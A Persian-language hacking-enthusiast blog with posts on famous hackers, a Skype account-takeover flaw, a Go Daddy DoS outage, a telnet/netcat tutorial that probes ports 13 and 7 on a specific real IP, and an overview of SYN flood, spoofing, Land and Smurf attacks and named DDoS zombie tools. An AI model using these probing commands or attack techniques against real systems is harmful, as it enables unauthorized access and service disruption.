loading...
بزرگترین پایگاه هکر های نوجوان
tkh بازدید : 114 یکشنبه 04 فروردین 1392 نظرات (1)

ضمن تبریک عید باستانی نوروز به همه ی شما عزیزان باید به اطلاعتان برسانم که فردی قصد داشت این وب را هک کند اما ناکام مانده بود بنده در پی یافتن این فرد برای معرفی به پلیس هستم اگر کسی به من می خواهد کمک کند می تواند در همین  پست در یک کامنت به من بگوید با تشکر از شما

 

tkh بازدید : 336 جمعه 15 دی 1391 نظرات (0)

فرد نفوذی به داخل سیستم نامه های الکترونیکی پایگاه مطالعاتی آب و هوا در انگلستان، نامه ها و مدارکی را از این پایگاه بر روی اینترنت منتشر کرده که نشان می دهد دانشمندان با پیچیده کردن اطلاعات و فریب مردم قصد باوراندن تئوری گرمای جهانی را دارند اما دانشمندان اعلام کرده اند متن این نامه ها تغییر پیدا کرده و تنها نشان می دهند که دانشمندان در حال گفتگوهای بی پرده و صریح در رابطه با بحران گرمای جهانی بوده اند.

در ادامه لیستی از مشهورترین هکرهای جهان که هر یک خسارات قابل توجهی را به شرکتهای مختلف وارد آورده اند و در نشریه تلگراف منتشر شده است، ارائه می شود.

کوین میتنیک:

برترین هکرهای دنیا+عکس

کوین پولسن:

برترین هکرهای دنیا+عکس

نفوذ به خطوط تلفنی ایستگاه رادیویی لس آنجلس به منظور برنده شدن در رقابت تلفنی که ایستگاه رادیویی در حال اجرای آن بود، اولین رسوایی فعالیتهای هکری پولسن به شمار می رود. وی با نام مستعار “دانته تاریک” جرائم رایانه ای دیگری از قبیل هک کردن پایگاه داده های تجسسهای فدرال را مرتکب شده و پس از آن دستگیر شد. وی پس از آزادی حرفه روزنامه نگاری را در پیش گرفته است.

آدرین لامو:

برترین هکرهای دنیا+عکس

استفن وزنیاک:

وی به دلیل اینکه یکی از بنیانگذران شرکت اپل به شمار می رود از شهرت بالایی برخوردار است، وی فعالیتهای خود را در زمینه هک با نفوذ به تلفنهای همراه آغاز کرد. به گزارش مهر، وی در حالی که در دانشگاه کالیفرنیا مشغول به تحصیل بود برای همکلاسی های خود ابزاری به نام جعبه آبی ساخت که به آنها امکان مکالمات راه دور طولانی مدت را به صورت رایگان می داد. وزنیاک با آغاز پروژه ساخت یک رایانه از ادامه تحصیل صرف نظر کرده و به همراه دوست خود استیو جابز رایانه اپل را ابداع کردند.

لوید بلنکن شیپ:

لوید بلنکن شیپ با نام مستعار “مرشد” از اعضای چندین گروه از هکرها در دهه ۱۹۸۰ بوده است. از بزرگترین عوامل به شهرت رسیدن وی نوشتن کتابی به نام “بیانیه هکر” یا “باطن یک هکر” بوده است که پس از دستگیری اش در سال ۱۹۸۶ نگاشته شده است. در این کتاب تنها جرم هکرها کنجکاوی ذکر شده است.

مایکل کالک:

برترین هکرهای دنیا+عکس

رابرت تاپان موریس:

برترین هکرهای دنیا+عکس

The Master of Deception:

این گروه از هکرها در اواسط دهه ۸۰ سیستم خطوط تلفن آمریکا را مورد هدف قرار دادند و به سیستم رایانه های AT&T نفوذ کردند. این گروه به تدریج و با دستگیر شدن اعضای آن در سال ۱۹۹۲ غیر فعال شد.

دیوید اسمیت:

وی خالق ویروس ملیسا اولین ویروس رایانه ای که از طریق اینترنت انتقال پیدا می کند بوده است. اسمیت مدت کوتاهی پس از گسترش این ویروس دستگیر شده و به دلیل به بار آوردن خسارتی در حدود ۸۰ میلیون دلار محکوم به زندان شد.

استیو جاشان:

وی به دلیل نوشتن ویروسهای Netsky و Sasser در سال ۲۰۰۴ و در حالی که دوره نوجوانی خود را سپری می کرد، متهم شناخته شد. این ویروس ها مسئول گسترش ۷۰ درصد از نرم افزارهای مخرب یا Malware ها در اینترنت به شمار می رفتند. وی اکنون به استخدام یک شرکت ایمنی رایانه ای درآمده است

tkh بازدید : 159 چهارشنبه 01 آذر 1391 نظرات (0)

 

وجود یک آسیب‌پذیری باورنکردنی امنیتی در سیستم اسکایپ٬ به شما این امکان را می‌دهد که تنها با دانستن آدرس ایمیل یک کاربر٬ به سادگی بتوانید اکانت اسکایپ‌اش را هک کنید.
اکانت‌های اسکایپ در معرض خطر جدیبه گـــزارش گــرداب به نقل از افتانا، اسکایپ که یک سرویس چت صوتی و تصویری است٬ با یک آسیب‌پذیری امنیتی بسیار جدی مواجه شده که از طریق تابع "password reset" می‌تواند اکانت کاربران را به سادگی در دسترس هکرها قرار دهد.
 
اسکایپ که حالا زیرمجموعه کمپانی مایکروسافت است٬ اعلام کرده که برای بررسی‌های دقیق‌تر٬ تا اطلاع ثانوی امکان ریست کردن پسوردها را غیرفعال کرده است. برای بسیاری از متخصصان امنیت٬ وجود چنین آسیب‌پذیری مهلکی در سیستم اسکایپ باورنکردنی بود. 

 هکرها به سادگی می‌توانند با در دست داشتن لیستی از ایمیل‌ها٬ یعنی صرفا با دانستن ایمیل یک کاربر٬ با استفاده از امکان "password reset" پسورد کاربران اسکایپ را تغییر دهند و کنترل همه اکانت‌هایی که با یک ایمیل مشخص ساخته شده‌اند را در دست گیرند.
 
این آسیب‌پذیری امنیتی نخستین بار دو ماه پیش و توسط یک گروه از هکرهای روسی کشف شده بود. اسکایپ از دو روز پیش (۲۴ آبان٬ ۱۴ نوامبر) از همه کاربران عذرخواهی و این گزینه را موقتا غیرفعال کرده است تا نواقص امنیتی را برطرف و کاربرانش را از گزند حملات هکرهای در کمین نشسته حفظ کند. 

در وبلاگ رسمی اسکایپ آمده است: «از صبح امروز (چهارشنبه) برخی از کاربران ما نسبت به امنیت تابع پسورد ری‌ست ابراز نگرانی کرده‌اند. اکانت برخی از این کاربران از همین طریق تحت تاثیر قرار گرفته و در مواردی چند اکانت به یک آدرس ایمیل متصل بوده‌اند. ما از صبح امروز این تابع را غیرفعال کرده‌ایم تا اصلاحات لازم روی آن انجام شود.»
tkh بازدید : 118 چهارشنبه 01 آذر 1391 نظرات (0)

 

حمله هکرها به وب سایت Go Daddy باعث شد وب سایت هایی که از این شرکت خدمات میزبانی و دی ان اس دریافت می کردند از دسترس خارج شوند.
به گزارش گرداب به نقل از سی‌نت، گروهی از هکرها با اسم مستعار Anonymous Own۳r اعلام کردند به وب سایت Go Daddy حمله کرده و آن را از دسترس خارج کرده اند. آنان از طریق حساب کاربری خود در سایت توئیتر این مسئله را به اطلاع عموم رساندند.
 
حمله هکرها به وب سایت Go Daddy باعث شد وب سایت هایی که از این شرکت خدمات میزبانی و دی ان اس دریافت می کردند از دسترس خارج شوند.

گو ددی نیز ضمن اعلام این خبر اظهار امیدوار کرده آثار و تبعات منفی آن هرچه سریع تر برطرف شود. مدیران گو ددی اعلام نکرده اند که در اثر این حملات چند وب سایت آسیب دیده اند، اما تخمین زده می شود تعداد این وب سایت ها به چندصدهزار یا حتی میلیون ها سایت برسد. حملات یاد شده از ساعت ۱۰ صبح روز 5شنبه به وقت محلی رخ داده است.

در اثر این حملات نه تنها سایت گو ددی از دسترس خارج شده، بلکه سرویس ایمیل و واحد خدمات به مشتریان آن هم از کار افتاده است.

گفته می شود حملات یاد شده از نوع DOS بوده است. با این حال گو ددی می گوید در مورد منشا این حملات در حال تحقیق و بررسی است.

شرکت گو ددی نه تنها یکی از بزرگترین ارائه دهندگان خدمات میزبانی وب است، بلکه بزرگترین شرکت ثبت کننده دامنه در جهان هم محسوب می شود. 

اختلال در دسترسی به سایت هایی که از گو ددی خدمات می گرفتند برای مدت طولانی ادامه یافته است. 

منبع: فارس
tkh بازدید : 119 چهارشنبه 01 آذر 1391 نظرات (0)

 

آیا تاکنون با خود اندیشیده‌اید که مجرمان سایبری، چگونه قربانیان خود را در فضای مجازی پیدا می‌کنند؟
به گزارش گرداب به نقل از اینفورمیشن ویک، هکرها به دنبال هک کردن چه اطلاعاتی هستند؟ این یکی از سوالات مهم در عرصه امنیت سایبری است که اغلب پاسخ درستی به آن داده نمی‌شود. 

باورهای غلط موجود در این زمینه باعث شده است تا کمپانی‌هایی که در معرض خطر وقوع چنین حملاتی هستند، جدیت کافی برای تجهیز سیستم‌های دفاعی خود را نداشته باشند. 

یکی از این باورهای غلط آن است که هکرها همان‌ جایی هستند که پول هست و بنا به این فرض، بانک‌ها و کمپانی‌های فعال در سیستم مالی از نخستین اهداف این مجرمان هستند و هر قدر این کمپانی‌های اقتصادی بزرگ‌تر باشند، هکرهای بیشتری را به طمع می‌اندازند. 
 
اما حقیقت چیست؟ نکته‌ای که باید در این زمینه در نظر گرفته شود آن است که با وجود آن‌که بانک‌ها تراکنش‌های مالی بسیار زیادی دارند، اما هر شرکتی که سیستم‌های امنیتی قوی ندارد– حتی یک کمپانی معمولی فروش مواد غذایی – می‌تواند قربانی بهتری در این زمینه باشد. 
 
کمپانی‌های بزرگ و بانک‌ها پول زیاد و متعاقبا سیستم‌های امنیتی بسیار قوی و گران قیمتی دارند و اغلب نفوذ به آن‌ها آسان نیست. کمپانی‌های کوچک یا سطح میانی، بودجه و امکانات کم‌تری برای سیستم‌های امنیتی و حفاظت از اطلاعات خود دارند و داده‌هایشان در معرض ریسک قرار دارد. 
 
در مورد افراد فعال در فضای سایبر نیز این امر صادق است. مجرمان حرفه‌ای می‌دانند که برای دست یافتن به اطلاعات ارزشمند حتما نیازی نیست که به رمز عبور مدیر یک شبکه دستیابی پیدا کنند و افراد مختلف، حتی بستگان یکی از کارمندان شرکت نیز می‌توانند گزینه مناسبی برای دستیابی به اطلاعات مورد نظر هکرها باشند. در حقیت می‌توان این امر را به این گونه تشبیه کرد که تلاش افراد برای رسیدن به میوه‌هایی که روی شاخه‌های پایینی یک درخت قرار دارند -حتی اگر کوچک هم باشند- بیشتر از میوه‌هایی است که دستیابی به آن‌ها دشوارتر است. 
 
هکرها در سیستم رایانه‌های شما به دنبال درهایی می‌گردند که فراموش کرده‌اید قفلشان کنید و راهی که کمترین سدها مقابل آن قرار دارد، بهترین گزینه است. 

کارشناسان به مدیران شبکه‌ کمپانی‌های کوچک و متوسط توصیه می‌کنند که اقدامات ایمنی و بهبود سیستم‌های امنیتی خود را جدی بگیرند و احساس ایمن بودن در برابر نفوذ و حملات هکری را فراموش کنند.
tkh بازدید : 109 پنجشنبه 25 آبان 1391 نظرات (0)

اولين نکته‌ای که بايد بگم اين است که ابزاری که به کمک آن با پورت‌ها صحبت می‌کنيم در همه پورت‌ها يکی است ولی هر پورتی زبان مخصوص خود دارد (درست مثل زبان‌های مختلف در جهان که همشون از طريق زبان و دهان ادا می‌شن ولی هر کدام روش خاصی برای ارتباط برقرار کردن دارند). پس ما برای کار با پورت‌ها بايد زبان هرکدام را ياد بگيريم.
بحث بعدی اين است که وقتی می‌گيم يه پورت بازه بايد توجه کنيد که برنامه‌ای روی آن کامپيوتر نصب شده و اون پورت را باز کرده است (پورت‌ها خود به خود باز نمی‌شوند). يک سری پورت‌ها توسط خود سيستم‌عامل باز می‌شوند (يعنی به محض نصب سيستم‌عامل که خودش هم درواقع يه نرم‌افزاره) و نيازی نيست که برنامه ديگری برايش نصب کنيم. در مقابل، بعضی پورت‌های ديگر توسط برنامه‌های جانبی باز می‌شوند.
به عنوان مثال وقتی می‌گم که پورت ۲۵ روی يک ip باز است، اين معنی را دارد که برنامه‌ای روی اون کامپيوتر خاص وجود دارد که پورت ۲۵ را باز کرده و من وقتی از طريق کامپيوتر خودم با آن پورت کار می‌کنم در واقع دارم با آن برنامه خاص (که اون پورت را باز کرده) صحبت می‌کنم. 
حالا يه سوال پيش می‌آد که چرا اصلا يه نرم‌افزار بايد پورت باز کنه و اينکه کدام نرم‌افزارها بايد پورت باز کنند؟
جواب اين است که هر برنامه‌ای که بخواهد از طريق شبکه (يعنی از راه دور اصطلاحا remote) قابل دسترس باشه بايد يه پورت باز کنه. پس يک برنامه‌ای که نيازی به برقراری ارتباط شبکه‌ای ندارد (مثلا يه نرم‌افزار گرافيکی) نبايد و نشايد که پورت باز کند.

بايد ببينيم که از طريق چه برنامه‌ای می‌توان با پورت‌ها صحبت کرد ( البته با هرکدام به روش خودشان )؟
برای اين‌کار از دو نرم‌افزار به نام‌های telnet و nc استفاده می‌کنيم. telnet که در خود سيستم‌عامل وجود دارد و nc را هم که جلسه قبل داون‌لود کرديم.
حالا چگونه از اين دو نرم‌افزارها می‌توان استفاده کنيم؟
۱- استفاده از telnet :
اگر بخواهيم با ip ای به شماره 194.225.184.13 از طريق پورت 25 صحبت کنيم بايد بنويسيم:

telnet 194.225.184.13 25
و بعد اينکه ارتباط برقرار شد بايد شروع کنيم و از طريق زبان پورت ۲۵ با آن صحبت کنيم.
۲- استفاده از nc :
اگر بخواهيم همان کار را با netcat انجام دهيم، بايد بنويسيم:

nc -v 194.225.184.13 25
و بعد از برقراری ارتباط شروع به صحبت کنيم.


- با پورت ۱۳ صحبت کنيم

نام ديگر اون daytime است و کارش هم اينه که زمان و تاريخ رو در اون کامپيوتر به ما می‌ده. اين پورت اصولا خيلی سر راسته. فقط کافيه که بهش وصل شيم تا اطلاعاتشون بيرون بريزه. البته اين پورت رو خيلی از کامپيوترها بسته است. (يادتون باشه که وقتی می‌توان با يه پورت کار کرد که باز باشد).
حالا می‌خوايم با پورت ۱۳ از ip شماره 194.225.184.13 صحبت کنم. يکی از اين دو دستور را می‌نويسم:

telnet 194.225.184.13 13

nc -v 194.225.184.13 13
البته در آن دستورات به جای عدد ۱۳ می‌توان معادلش را نوشت که daytime است.
و جواب می‌شنوم:

11[IMG]http://forum.*-*-*-*-*-*-*-*-.com/images/New-smile/N_aggressive%20%288%29.gif[/IMG]33 AM 10/5/2002
بله، با اين پورت ارتباط برقرار کرديم و اطلاعاتش رو دريافت کرديم. اين اطلاعات معمولا به درد اين می‌خورد که مکان جغرافيايی اون کامپيوتر را حدس بزنيم (البته اگر زمان اون کامپيوتر صحيح باشد). به عنوان مثال اين کامپيوتر خاص در ايران است چون ساعتش همزمان با ايران است.


- با پورت ۷ صحبت کنيم

اسم اين پورت echo است. من اين پورت رو پورت ميمون می‌گم چون هرچی که شما براش بنويسيد را تقليد می‌کنه و همان‌ها را براتون پس می‌فرستد. مثلا من به پورت ۷ کامپيوتری با ip شماره 194.225.184.13 تلنت يا nc می‌کنم.

telnet 194.225.184.13 7

nc -v 194.225.184.13 7
بعد از برقراری ارتباط، هر چی من بنويسم، اون برام پس می‌فرسته. مثلا اگه تايپ کنم Ali1000 و Enter بزنيم، جواب می‌شنوم، Ali1000 ... خودتون امتحان کنيد تا ببينيد. برای تمام شدن کار بايد دکمه Ctrl+C را فشار دهيم تا اين ميمون بازی تموم بشه.
پس کار کردن با اين پورت هم زياد سخت نيست
منبع:آراز صمدي  

tkh بازدید : 116 پنجشنبه 25 آبان 1391 نظرات (0)

بررسي حملات D.O.S

شايد بيشتر مديران شبكه‌ها و علاقه مندان به امنيت اسم حملاتي موسوم به DOS را در سال‌هاي اخير شنيده باشند. اما بيشتر آنها ندانند DOS چگونه عمل مي‌كند و پيامدهاي ناشي از اين حمله چيست ؟ گروهي نيز تفكرات نادرسي از حملات DOS در ذهن دارند و فكر مي‌كنند كه مي توان با استفاده از يك ديوار آتش نرم‌افزاري يا برنامه‌هايي ديگر از اين قبيل با حملات DOS و DDOS مقابله كرد و جلوي آن را گرفت.

سياري از سايت‌هاي بزرگ نيز در حال حاضر قادر به مقابله با حملات DOS نيستند زيرا اين حملات به نوع متفاوتي سازماندهي مي‌شوند و در بيشتر اوقات با ايجاد ترافيكي بالا لشكري از Packet هاي TCP را به سمت سرويس‌هاي خدمات دهنده سرازير مي‌كنند. به عنوان مثال در هنگام به وجود آمدن و شناسايي ويروس Blaster پس از آلوده شدن صدها هزار كامپيوتر در سراسر دنيا بوسيله اين كرم كامپيوتري كه از يك ضعف در سيستم عامل‌هاي ويندوز مايكروسافت استفاده مي‌كرد، خبري با اين عنوان كه اين ويروس در روز 20 اگوست شروع به فرستادن پاكت‌هايي به سمت سايت windowsupdate.com مي‌نمايد در رسانه‌هاي امنيتي انتشار يافت كه در پي آن مسئولين امنيتي مايكروسافت چاره‌اي جز از كار انداختن سايت Windowsupdate.com و حذف آن از DNSهاي جهاني نديدند. با اينكه آنها تا آخرين لحظات از عنوان كردن روش خود يعني از كار انداختن سايت مورد نظر خودداري مي‌نمودند، اما قابل پيش‌بيني بود كه به هيچ وجه سرويس‌هاي خدمات دهنده مايكروسافت نيز قادر به مقابله با اين حجم ترافيك بالا نخواهند بود و دير يا زود از سرويس دهي باز مي‌مانند.


چگونگي عملكرد ويروس Blaster براي ايجاد يك حمله DOS

1- در طي يك هفته ويروس Blaster انتشار يافت و حدود 50000 هزار ماشين را در سراسر دنيا آلوده ساخت.
2- پس از رسيدن به روزي كه كرم Blaster براي آن تاريخ برنامه‌ريزي شده بود، قرار بر اين بود كه ماشين‌هاي آلوده از سراسر دنيا شروع به ارسال پاكت‌هايي به پورت 80 سايت www.windowsupdate.com كنند كه يكي از سايت‌هاي مايكروسافت مي‌باشد در نتيجه با مشغول شدن سرويس دهندگان سايت براي رسيدگي به درخواست‌هاي ماشين‌هاي آلوده امكان جوابگويي به درخواست‌هاي مشتريان واقعي نبود و همين باعث به وجود آمدن يك حمله DOS مي‌شد.

امروزه نسل جديدي از حملات DOS به وجود آمده‌اند كه DDOS نام گرفته‌اند. اين حملات نوع گسترش يافته حملات DOS هستند كه از اواخر سال 1999 مورد استفاده قرار گرفته‌اند . در سال 2000 حملات DDOS توسط نفوذگران براي از كار انداختن و حمله به سايت‌هاي بزرگي مانند, e-Bay CNN , Amazon مورد استفاده قرار گرفته است.

بررسي حملات D.D.O.S

در چند ماه گذشته در گيرودار دادگاه جنجالي شركت SCO سايت اين شركت توسط طرفداران سيستم عامل‌هاي لينوكس و كدباز مورد حمله DDOS قرار گرفت و براي چند روز از كار افتاد، اين حمله يكي از بي‌سابقه‌ترين و سخت‌ترين حملات DDOS در چند سال اخير محسوب مي‌شود.

نمودار زير ميزان Hit هاي وارد شده به سايت Sco را در ثانيه نشان مي دهد . 
منظور از Hit درخواست هايي مي باشند كه از سرويس دهنده تقاضا مي شوند.



همانطور كه در شكل مشاهده مي‌كنيد اين حملات از تاريخ چهارشنبه 10 دسامبر و در ساعت 3:20 شروع شده كه تعداد پاكت‌هاي ارسالي 34000 پاكت در ثانيه بوده است. در روز پنجشنبه 11 دسامبر و در ساعت 2:50 صبح حمله كنندگان دست به حمله ديگري زدند اين بار با هزاران ماشين از سراسر دنيا سرويس Ftp و WEB شركت Sco را با آدرس هاي www.Sco.com و Ftp.Sco.com مورد حمله SYN Flood قرار دادند.

تعداد درخواست‌ها براي حمله در اين روز به حداكثر خود يعني 50000 درخواست در ثانيه رسيد و بالاخره در ساعت 10:45 روز پنجشنبه شركت Sco مجبور به حذف ماشين سرويس دهنده وب خود شد تا با اين كار از ورود درخواست‌هاي حمله كنندگان براي اتصال به اين ماشين جلوگيري كند.

اين روزها نسل جديدي از ويروس ها كه پس از Blaster به وجود مي آيند از تكنيك DOS براي حمله به اهداف خود استفاده مي‌كنند . اين كرم هاي اينترنتي پس از آلوده كردن تعداد زيادي ماشين در سراسر دنيا در تاريخي خاص شروع به ارسال پكت به سوي اهداف از قبل تعيين شده مي‌كنند و حمله اي را به صورت DOS به وجود مي آورند مانند انواع ويروس MY. doom . اين حملات به علت گستردگي ارسال درخواست‌ها ترافيك زيادي را بر روي اينترنت ايجاد مي‌كنند و شركت‌ هاي مورد حمله قرار گرفته كار زيادي در جهت مقابله با آن نمي‌توانند انجام دهند.

در مورد ديگر مي توان به ويروسCycle اشاره كرد كه يك ويروس ايراني بود و در اهداف خود را به همين وسيله مورد حمله قرار مي داد.

با بررسي اين حملات مي‌توان نتيجه گرفت با اين كه در روش DDOS از تكنيك‌هاي ساده و قديمي استفاده مي‌شود اما مي‌توان با ترتيب دادن حملات گسترش يافته شركت‌هاي بزرگي مانند Microsoft و Sco را نيز دچار مشكل كرد تا جايي كه تنها چاره‌اي كه براي مسئولين امنيتي اين شركتها باقي مي ماند قطع ارتباط ماشين‌هايي است كه مورد حمله قرار گرفته‌اند.

در ادامه به بررسي روشن‌تري از حملات DOS و آشنايي با چگونگي عملكرد پروتكل TCP مي‌پردازيم. سپس انواع حملات DOS را طبقه‌بندي كرده و تشريح مي‌كنيم و ابزاري كه نفوذگران از آن براي ايجاد اين حملات استفاده مي‌كنند را معرفي خواهيم كرد.

D.O.S (Denial Of Service Attack
حمله‌اي كه باعث جلوگيري از كار يك سرويس يا مانع دسترسي به منابعي شود را حمله DOS گويند . به عنوان مثال حملات D.O.S بر روي ماشين‌هاي سرويس دهنده وب ممكن است منجرب به اين شود كه سرويس دهنده قادر به سرويس دهي به مشتريان نباشد. يا پر كردن پهناي باند يك ماشين باعث قطع ارتباط اين ماشين با شبكه اصلي مي شود.
براي بررسي دقيق‌تر و بيان نحوه عملكرد حملات D.O.S احتياج به بررسي پاكتهاي TCP و چگونگي برقراري ارتباط تحت پروتكل TCP/IP است كه در اين مقاله به بررسي اجمالي از آن مي پردازيم .

بررسي اجزاي داخل يك پكت TCP :



اجزاي داخلي يك پكت TCP شامل اطلاعاتي در مورد درگاه مبدا درگاه مقصد شماره رشته داده ها و... مي‌باشد كه باعث مي‌شود اطلاعات در مسير اينترنت جا به جا شوند.

بررسي عملكرد پروتكل TCP

سه مرحله اصلي دست دادن يا برقراري ارتباط بين يك سرويس دهنده و يك مشتري:
در اين شكل سرويس دهنده(Server) با اسم TCP B و مشتري(Client) با اسمTCP A نشان داده شده است.

1 - مشتري پكت TCP را با علامت SYN براي سرويس دهنده ارسال مي نمايد . اين پكت باعث مي شود سرويس دهنده متوجه گردد كه مشتري درخواست ارسال اطلاعات را دارد. در اين هنگام مشتري منتظر جواب از سوي سرويس دهنده باقي مي‌ماند تا در صورت برگشت جواب اطلاعات را ارسال كند .
2 - سرويس دهنده پس از دريافت در خواست مشتري يك پكت را با علامت SYN/ACK در پاسخ براي مشتري ارسال مي‌نمايد. اين پكت نشان دهنده اجازه برقراري ارتباط و ارسال اطلاعات مي‌باشد.
3- مشتري پس از دريافت پكت از سوي سرويس دهنده يك ACK براي سرويس دهنده ارسال مي‌كند .
4 - سپس مشتري اقدام به ارسال اطلاعات مي‌كند.



بررسي انواع روش‌هاي DOS

بررسي حمله SYN flood :
اين حمله با ارسال درخواست‌هاي متعدد با علامت SYN به ماشين قرباني باعث پر شدن سف Backlog مي‌شود. اما Backlog چيست؟ تمامي درخواست‌هايي كه به ماشين وارد مي‌شوند و شامل علامت SYN براي برقراري ارتباط مي‌باشند در قسمتي از حافظه به ترتيب ذخيره مي‌شوند تا پس از بررسي جواب آنها داده شده و ارتباط برقرار شود، اين قسمت از حافظه Backlog Queue نام دارد. وقتي كه اين قسمت به علت درخواست‌هاي زياد پر شود، سرويس دهنده مجبور به رها كردن درخواست‌هاي جديد مي‌شود و در نتيجه از رسيدگي به اين درخواست‌ها باز مي ماند (Denial Of Service) . ) شكل شماره 4-1 (



بررسي Reset(RST) :
پاكت‌هايي كه به علامت RST ارسال مي‌گردند باعث مي‌شوند كه ارتباط مورد نظر قطع گردد. در واقع اگر ماشين A به سمت ماشين B پاكتي را با علامت RST ارسال كند درخواست اتصال مورد نظر از Backlog پاك خواهد شد.
از اين حمله مي توان براي قطع اتصال دو ماشين استفاده كرد. به اين ترتيب كه اتصالي كه بين دو ماشين A و B برقرار است را نفوذگر با ارسال يك در خواست RST به ماشين B از طرف ماشين A قطع مي‌كند. در واقع در داخل پكتي كه از سوي ماشين نفوذگر به سمت قرباني ارسال مي‌شود IP مشتري گذاشته مي‌شود و در اين صورت ماشين B كه سرويس دهنده مي‌باشد ارتباط مورد نظر ماشين A را از Backlog حذف مي‌كند.
در اين روش شخص حمله كننده بوسيله ابزاري مي‌تواند IP جعلي توليد كرده و در واقع درخواست خود را جاي ماشين ديگري ارسال كند. به اين تكنيك Spoofing نيز گفته مي شود . (شكل شماره 5-1(

با كمي دقت در شكل شماره 5-1 در مي‌يابيد IP مبدا (SourceIP) كه در پكت ارسالي از سوي ماشين حمله كننده به سمت ماشين B ميرود همان IP ماشين شماره A مي باشد(1.1.1.1( . در صورتيكه IP ماشين شماره C كه نفوذگر از آن استفاده مي‌كند چيز ديگري است . (1.1.1.3(



بررسي حمله Land Attack :
در اين حمله با استفاده از روش Spoofing در پاكت‌هايي كه به سمت سرويس دهنده ارسال مي‌شود به جاي IP و Port مبداء و مقصد IP و Port خود ماشين سرويس دهنده قرار داده مي‌شود.
در واقع IP و PORT ماشين سرويس دهنده به سمت خود سرويس دهنده ارسال مي‌شود. اين عمل باعث مي شود تا در سيستم عامل‌هاي قديمي يك حلقه داخلي Routing به وجود بيايد كه باعث پر شدن حافظه و به وجود آمدن حمله DOS مي شود. اين حمله در ماشين‌هاي Win 95 (winsok 1.0) و Cisco IOS ver 10.x و سيستم‌هاي قديمي باعث از كار افتادن سيستم مي‌شد اما امروزه تمامي سيستم هاي هوشمند مانند IDS ها قادر به شناسايي اين حملات مي باشند و اين حمله تاثير زيادي بر روند كاري سرويس دهنده ندارد.

بررسي حمله Smurf Attack :
اين حملات با ارسال درخواست‌هاي ICMP به سمت محدوده‌اي از IP هاي amplifier باعث وسعت دادن ترافيك و به وجود آمدن حمله DOS مي شوند.
حمله كننده مي‌تواند درخواست‌هاي ICMP خود را به صورت Spoof شده و از طرف ماشين قرباني به IP هاي amplifier ارسال كند با ارسال هر درخواست صدها جواب براي درخواست ICMP به سمت ماشين قرباني سرازير مي شوند و ترافيك آن را بالا مي برند. ( شكل شماره 6 - 1)
Amplifier: تمام شبكه‌هايي كه درخواست‌هاي ICMP را براي IP broadcast خود ----- نكرده‌اند يك Amplifier محسوب مي شوند. 
حمله كننده مي‌تواند در خواست‌هاي خود را مثلا به IP هايي مانند:
192.168.0.xxx كه X مي تواند 255, 223, 191, 159, 127, 95, 63, 31, 15, 7, 3 يعني IP هاي Broadcast باشند ارسال كند . البته قابل ذكر است IP broadcast بستگي به چگونگي بخش‌بندي IP در شبكه دارد.



IDS: اين برنامه ها نسل جديد برنامه هاي امنيتي هستند كه قادرند ترافيك يك شبكه را مورد بررسي قرار داده و حملات جديد نفوذگران را شناسايي كرده و جلوي آن را بگيرند خصوصيت اين برنامه ها هوشمند بودن آنها است. اين برنامه ها در لايه هاي پايين شبكه تمامي پكتهاي رد و بدل شده بين ماشين ها را خوانده و مورد بررسي قرار مي‌دهند.

معرفي ايزارهاي D.O.S



چند نمونه از برنامه‌هايي كه توسط نفوذگران بر روي ماشين‌هاي Zombie براي حملات DOS مورد استفاده قرار مي‌گيرند به شرح زير مي باشند:
Trin00
TFN2K(Tribe Flood Network)
Stacheldraht
t wintrin00
mstream
Evil bot
Pulse 2002 (BY Security Storm)

تمامي اين برنامه‌ها قادرند به عنوان ابزاري براي به وجود آوردن حملات DOS مورد استفاده قرار گيرند.
نفوذگران براي آن كه بتوانند حملات خود را به صورت كامل انجام دهند احتياج به ماشين‌هاي زيادي دارند تا با در اختيار گرفتن پهناي باند ماشين‌هاي آلوده يا همان Zombie ها حملات DOS خود را شكل دهند بيشتر آنها به نفوذ به اين ماشين‌ها بر روي آنها برنامه هايي را نصب مي‌كنند كه قادرند تا در زمان مشخص فرمان‌هاي خود را بر روي آنها اجرا كنند يكي از اين برنامه ها Evil bot است كه نفوذگر مي‌تواند فرمان‌هاي خود را از طريق يك IRC server به صدها ماشين آلوده در يك زمان ارسال كند.

Zombie: بيشتر ماشين‌هاي موجود در دانشگاه‌ها و يا مراكز دولتي به علت پهناي باند مناسبي كه دارند و همچنين رعايت نكردن اصول امنيتي كافي هك شده و بعد از نصب ابزار DOS بر روي آنها توسط نفوذگران براي تشكيل حملات DOS مورد استفاده قرار مي‌گيرند، در اصطلاح Zombie به ماشين‌هايي گفته مي‌شود كه توسط نفوذگران هك شده‌اند و نفوذگران قادرند با درخواست‌هاي خود از روي اين ماشين‌ها قرباني خود را مورد حمله قرار دهند.

-------------------------------------------
1- windowsupdate.comيكي از سايت‌هاي مايكروسافت كه امكان دريافت اخرين Patch هاي سيستم عامل‌هاي مختلف ويندوز بوسيله آن امكان پذير است.
2- براي اطلاعات و اخبار بيشتر در مورد عملكرد blaster مي توانيد به پيوندهاي زير مراجعه كنيد :
http://www.hat-squad.com/blog/archives/000042.html 
http://www.hat-squad.com/blog/archives/000041.html
http://www.hat-squad.com/blog/archives/000038.html
3- اخبار مربوط به حمله DDOS بر روي سرويس شركت SCO :
http://www.computerworld.com/governm...,00.html?f=x62
http://www.caida.org/analysis/security/sco-dos
4- براي اطلاعات و اخبار بيشتر در مورد عملكرد ويروس Cycle مي توانيد به پيوند زير مراجعه كنيد:
http://www.hat-squad.com/pe/000074.html

منبع ITNA

tkh بازدید : 143 پنجشنبه 25 آبان 1391 نظرات (0)
هر نوع نفوذ که توسط هکر در یک سیستم امینتی شبکه و کامپیوتری انجام گیرید به نوعی هک گفته می شود واژه‌ی هک به معنی نفوذ به سیستم‌های کامپیوتری و دسترسی غیرمجاز به سیستم‌ می‌باشد. به شخصی که این کار را انجام می‌دهد هکر گفته می‌شود.

به طور حتم بارها واژه را شنیده اید ویا خبر مربوط به هک هک وب سایتهای مهم ویا دولتی را شنیده اید در این گفتار به اختصار سعی می کنم با تعریف عمومی هک آشنا شویم با بهتر دریابیم هک چیست؟ , هکر کیست؟ هدف هک چیست یا چرا هکرها چرا نفوذ می کنند؟ انواع هکرها و نفوذگران کامپیوتر را مرور می کنم با ما باشید.
هر نوع نفوذ که توسط هکر در یک سیستم امینتی شبکه و کامپیوتری انجام گیرید به نوعی هک گفته می شود واژه‌ی هک به معنی نفوذ به سیستم‌های کامپیوتری و دسترسی غیرمجاز به سیستم‌ می‌باشد. به شخصی که این کار را انجام می‌دهد هکر گفته می‌شود.
● هک hack چیست؟
